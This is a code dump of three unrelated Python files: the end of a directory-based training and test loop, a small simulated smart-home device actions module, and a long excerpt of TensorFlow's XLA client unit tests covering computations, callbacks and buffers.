#Trainer.train(traindir)
dir_list = [];
for j in range(i + 1, dirnum): # test other dir
testdir = os.path.join(srcdir, fileList[j])
if not os.path.isdir(testdir):
print(fileList[j] + ' is not a dir')
continue
dir_list.append(testdir)
test_others(fileList[i], dir_list)
#Trainer.clean()
Utils.removeSubFilesInDir(const.TRAIN_OTHER)
#set_trace()
resultfile.close()
#Utils.removeSubFilesInDir(const.TRAIN_NEG)
end = time.time()
print('\n finish time : {:.3f}s\n'.format(end - start))
|
actions_implementation.py
|
import threading
import time
import random
def timer(seconds, var, oldValue):
time.sleep(int(seconds))
var['value'] = oldValue
def fade_out(device):
seconds = 100
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
if prop['title'] == "brightness":
while seconds > 10:
seconds = seconds - 10
prop['value'] = str(seconds)
time.sleep(1)
if seconds == 10:
prop['value'] = str(100)
def turnOnHeating_function(params, device):
if len(params) < 2:
return None
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
threading.Thread(target=lambda: timer(params[1], prop, "false")).start()
return True
def fade_action(params, device):
threading.Thread(target=lambda: fade_out(device)).start()
return True
def isSomeoneInside(params, device):
return random.choice(["true", "false"])
def unlockForSeconds(params, device):
if len(params) < 2:
return None
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
threading.Thread(target=lambda: timer(params[1], prop, "false")).start()
return True
def suggestTemperature(params, device):
return random.randint(20, 30)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING)
self._ExecuteAndCompareClose(c, expected=[0.75])
def testCustomCallWithUnifiedApi(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
opaque_str = b"foo"
ops.CustomCallWithLayout(
c,
b"test_add_input_and_opaque_len",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
# With opaque length = 3.0
opaque=opaque_str,
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING_UNIFIED)
self._ExecuteAndCompareClose(c, expected=[1.25 + len(opaque_str)])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testPythonCallbackCanHandleExceptions(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
raise ValueError("Value error raised!")
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape], has_side_effects=True)
with self.assertRaisesRegex(xla_client.XlaRuntimeError,
"Value error raised!"):
self._Execute(c, [arg0])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(xla_client.XlaRuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testLayout(self):
f32 = xla_client.PrimitiveType.F32
a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
self.assertEqual(a.minor_to_major(), (0, 1))
self.assertEqual(b.minor_to_major(), (0, 1))
self.assertEqual(c.minor_to_major(), (1, 0))
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(b, c)
self.assertEqual(hash(a), hash(b))
self.assertNotEqual(hash(a), hash(c))
self.assertNotEqual(hash(b), hash(c))
def testBlockUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_until_ready()
# This test merely checks that nothing goes awry when we call
# block_until_ready(); it's difficult to test anything else.
def testBlockUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
self.assertTrue(buffer.is_ready())
buffer.delete()
with self.assertRaises(xla_client.XlaRuntimeError):
buffer.block_until_ready()
with self.assertRaises(xla_client.XlaRuntimeError):
buffer.is_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
